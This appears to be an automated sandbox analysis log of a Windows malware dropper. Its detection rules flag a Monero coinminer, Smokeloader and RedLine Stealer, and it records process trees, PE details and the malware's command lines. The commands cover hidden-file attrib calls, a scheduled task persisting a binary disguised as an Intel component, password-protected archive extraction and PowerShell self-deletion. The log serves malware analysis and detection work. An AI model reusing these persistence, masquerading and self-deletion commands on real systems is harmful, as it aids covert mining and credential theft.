                    Source: 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: file.bin.16.drZip Entry: encrypted
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: .idata
                    Source: random[1].exe0.14.drStatic PE information: section name:
                    Source: random[1].exe0.14.drStatic PE information: section name: .idata
                    Source: random[1].exe0.14.drStatic PE information: section name:
                    Source: 352def4414.exe.14.drStatic PE information: section name:
                    Source: 352def4414.exe.14.drStatic PE information: section name: .idata
                    Source: 352def4414.exe.14.drStatic PE information: section name:
                    Source: random[1].exe1.14.drStatic PE information: section name:
                    Source: random[1].exe1.14.drStatic PE information: section name: .idata
                    Source: random[1].exe1.14.drStatic PE information: section name:
                    Source: d5cd5e4aa8.exe.14.drStatic PE information: section name:
                    Source: d5cd5e4aa8.exe.14.drStatic PE information: section name: .idata
                    Source: d5cd5e4aa8.exe.14.drStatic PE information: section name:
                    Source: random[1].exe2.14.drStatic PE information: section name:
                    Source: random[1].exe2.14.drStatic PE information: section name: .idata
                    Source: random[1].exe2.14.drStatic PE information: section name:
                    Source: ea17d0b77a.exe.14.drStatic PE information: section name:
                    Source: ea17d0b77a.exe.14.drStatic PE information: section name: .idata
                    Source: ea17d0b77a.exe.14.drStatic PE information: section name:
                    Source: random[2].exe.14.drStatic PE information: section name:
                    Source: random[2].exe.14.drStatic PE information: section name: .idata
                    Source: 9434b989db.exe.14.drStatic PE information: section name:
                    Source: 9434b989db.exe.14.drStatic PE information: section name: .idata
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009796AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,20_2_009796AC
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B678BB0_2_00B678BB
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B688600_2_00B68860
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B670490_2_00B67049
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B631A80_2_00B631A8
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B24B300_2_00B24B30
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B24DE00_2_00B24DE0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B62D100_2_00B62D10
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6779B0_2_00B6779B
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B57F360_2_00B57F36
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00F778BB3_2_00F778BB
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00F788603_2_00F78860
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00F770493_2_00F77049
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00F731A83_2_00F731A8
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00F34B303_2_00F34B30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00F34DE03_2_00F34DE0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00F72D103_2_00F72D10
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00F7779B3_2_00F7779B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00F67F363_2_00F67F36
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 4_2_00F778BB4_2_00F778BB
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 4_2_00F788604_2_00F78860
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 4_2_00F770494_2_00F77049
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 4_2_00F731A84_2_00F731A8
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 4_2_00F34B304_2_00F34B30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 4_2_00F34DE04_2_00F34DE0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 4_2_00F72D104_2_00F72D10
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 4_2_00F7779B4_2_00F7779B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 4_2_00F67F364_2_00F67F36
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0099F13E20_2_0099F13E
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009924C020_2_009924C0
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0099545820_2_00995458
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009947AC20_2_009947AC
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009B881720_2_009B8817
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_00980DCC20_2_00980DCC
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0097F1B420_2_0097F1B4
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0097B11420_2_0097B114
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0098C27820_2_0098C278
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009B352820_2_009B3528
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009A257820_2_009A2578
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009A066E20_2_009A066E
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0099D66C20_2_0099D66C
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0098D85820_2_0098D858
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009A99B820_2_009A99B8
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009B49A520_2_009B49A5
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009A79DC20_2_009A79DC
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0099694C20_2_0099694C
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009AFA0C20_2_009AFA0C
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009BDA3020_2_009BDA30
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_00988CA820_2_00988CA8
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009BDC1120_2_009BDC11
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_00987C6820_2_00987C68
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009BDD0020_2_009BDD00
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_00996E0820_2_00996E08
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_00978F1820_2_00978F18
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0098AF5820_2_0098AF58
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: SecurityJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00F480C0 appears 260 times
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00F4DF80 appears 36 times
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 00B380C0 appears 130 times
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: 40.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: 40.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: 0000002E.00000002.4037878938.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 0000002E.00000002.4018196816.0000000000F39000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9982171747275205
                    Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9982171747275205
                    Source: random[1].exe0.14.drStatic PE information: Section: lbajxhwa ZLIB complexity 0.9942148503970505
                    Source: 352def4414.exe.14.drStatic PE information: Section: lbajxhwa ZLIB complexity 0.9942148503970505
                    Source: random[1].exe1.14.drStatic PE information: Section: ewodcgyw ZLIB complexity 0.9902948848967298
                    Source: d5cd5e4aa8.exe.14.drStatic PE information: Section: ewodcgyw ZLIB complexity 0.9902948848967298
                    Source: random[1].exe2.14.drStatic PE information: Section: ZLIB complexity 0.997117133989726
                    Source: random[1].exe2.14.drStatic PE information: Section: vznsjynp ZLIB complexity 0.9947025476983646
                    Source: ea17d0b77a.exe.14.drStatic PE information: Section: ZLIB complexity 0.997117133989726
                    Source: ea17d0b77a.exe.14.drStatic PE information: Section: vznsjynp ZLIB complexity 0.9947025476983646
                    Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@84/46@0/11
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0097AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,20_2_0097AC74
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_00981D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,20_2_00981D04
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0097ABB0 GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,20_2_0097ABB0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: ea17d0b77a.exe, 0000002F.00000003.3290869974.00000000059B9000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3291620303.000000000599D000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3317040287.00000000059AF000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3855365717.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524217767.00000000053D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: file.exeReversingLabs: Detection: 50%
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe "C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                    Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                    Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe "C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe "C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe "C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe "C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe "C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe "C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe "C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe "C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe "C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
